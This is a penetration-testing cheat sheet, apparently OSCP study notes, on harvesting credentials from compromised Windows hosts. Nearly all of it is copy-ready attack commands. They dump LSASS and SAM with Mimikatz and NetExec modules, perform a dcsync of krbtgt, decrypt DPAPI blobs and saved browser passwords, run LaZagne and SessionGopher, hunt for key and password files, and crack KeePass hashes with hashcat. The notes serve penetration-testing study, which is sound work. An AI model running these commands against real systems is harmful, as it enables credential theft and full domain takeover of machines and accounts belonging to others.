Credential Harvesting {} Post Exploitation

By l1nuxkid

Checklist (Run First)

Run LaZagne / winPEAS
Check PowerShell history (all users)
Run Mimikatz — logonpasswords + SAM
Dump LSASS
Search for .kdbx / .kdb .ibd files
Check AutoLogon registry keys
Check cmdkey /list (stored creds)
Hunt config / xml / ini / env files
Check AppData Credentials folder (DPAPI blobs)
Run Snaffler on AD file shares
Check WiFi profiles
Check browser saved passwords

PowerShell History

# Get history file path
(Get-PSReadlineOption).HistorySavePath

# Read it
cat $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# All users
foreach($user in ((ls C:\users).fullname)){
    cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue
}

# Transcripts
gci C:\ -Recurse -Force -ErrorAction SilentlyContinue -Filter *transcript*.txt
type C:\Users\Public\Transcripts\transcript01.txt

nxc smb 192.168.1.80 -u ieuser -p 123 -M powershell_history
nxc smb 192.168.1.80 -u ieuser -p 123 -M winscp
nxc smb 192.168.1.80 -u ieuser -p 123 -M vnc
nxc smb 192.168.1.46 -u administrator -p 123 -M wifi
nxc smb 192.168.1.53 -u yashika -p Password@1 --ntds

DPAPI / Stored Credentials

WinRM sessions can't decrypt DPAPI blobs — need an interactive logon. Use RunasCs.

cmdkey /list

# Dump interactively via RunasCs
.\RunasCs.exe -l 2 -d domain.htb username Password123 "cmdkey /l"

# PowerShell dump
Import-Module .\Invoke-WCMDump.ps1
Invoke-WCMDump

DPAPI Credential Blob Locations

C:\Users\<user>\AppData\Roaming\Microsoft\Credentials
C:\Users\<user>\AppData\Local\Microsoft\Credentials
C:\Users\<user>\AppData\Roaming\Microsoft\Protect\[SID]

https://github.com/GhostPack/SharpDPAPI

.\SharpDPAPI.exe machinetriage
.\SharpDPAPI.exe machinevaults
.\SharpDPAPI.exe machinecredentials

nxc smb 192.168.1.80 -u ieuser -p 123 --dpapi
nxc smb 192.168.1.80 -u ieuser -p 123 --lsa

Registry Hunting

AutoLogon Credentials

# Check Winlogon for saved passwords
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /s

# Look for DefaultPassword, DefaultUserName, DefaultDomain

Application Credentials

# PuTTY saved sessions
reg query HKCU\SOFTWARE\SimonTatham\PuTTY\Sessions
reg query HKCU\SOFTWARE\SimonTatham\PuTTY\Sessions\<session_name>

# VNC credentials
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\Software\ORL\WinVNC3\

SessionGopher — PuTTY / WinSCP / RDP / FileZilla

powershell -ep bypass
Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -Target HOSTNAME

##To run remotely
Import-Module .\SessionGopher.ps1;
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss

nxc smb 192.168.56.11 -u eddard.stark -p FightP3aceAndHonor! -M putty

File System Searching

# Quick file searches
gci C:\ -Recurse -Force -EA SilentlyContinue -Include *.kdbx,*.kdb,*.keychain -File

# Password-related files (under 1MB)
gci C:\ -Recurse -Force -EA SilentlyContinue -Include *pass*,*cred*,*secret*,*.env,*.config,*.ini,*.xml,*.json -File | Where-Object {$_.Length -lt 1048576}

# Database files
gci C:\ -Recurse -Force -EA SilentlyContinue -Include *.db,*.sqlite,*.mdb,*.bak,*.backup -File

# Archives (under 50MB)
gci C:\Users\ -Recurse -Force -EA SilentlyContinue -Include *.zip,*.7z,*.rar -File | Where-Object {$_.Length -lt 52428800}

# Certificates and keys
gci C:\ -Recurse -Force -EA SilentlyContinue -Include *.pem,*.key,*.ppk,*.pfx,*.cer -File

XAMPP / Web App Configs

gci C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
type C:\xampp\mysql\bin\my.ini

KeePass Cracking

# Find database
gci C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

# Extract hash
keepass2john Database.kdbx > keepass.hash

# Crack
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force

Browser & Application Creds

Chrome/Edge

# With SharpChrome
.\SharpChrome.exe logins /unprotect

# Manual Chrome dictionary
gc 'C:\Users\$USER\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password

# Firefox
# Use firefox_decrypt.py
python firefox_decrypt.py C:\Users\$USER\AppData\Roaming\Mozilla\Firefox\Profiles\

Automated Tools

# Download from: https://github.com/AlessandroZ/LaZagne/releases
.\lazagne.exe all
.\lazagne.exe browsers
.\lazagne.exe wifi
.\lazagne.exe windows

winpeas.exe

# use winpeas options winpeas.exe -o

# Basic auth capture
privilege::debug
token::elevate
log saved.log
sekurlsa::logonpasswords
lsadump::sam
vault::cred
vault::list
lsadump::secrets
lsadump::cache

# Ticket operations
sekurlsa::tickets /export
kerberos::ptt <ticket.kirbi>
klist

# DPAPI
dpapi::chrome
dpapi::cred /in:C:\path\to\cred\file

.\mimikatz.exe "privilege::debug" "token::elevate" "log saved.log" "sekurlsa::logonpasswords" "lsadump::sam" "vault::cred" "vault::list" "exit"

nxc smb 192.168.255.131 -u administrator -p pass -M lsassy
nxc smb 192.168.255.131 -u administrator -p pass -M nanodump
nxc smb 192.168.255.131 -u Administrator -p pass -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt"

PreviousOSCP Active Directory Checklist NextWindows Library File Attack

Last updated 1 hour ago

Good morning

hashtagChecklist (Run First)

hashtagPowerShell History

hashtagDPAPI / Stored Credentials

hashtagRegistry Hunting

hashtagFile System Searching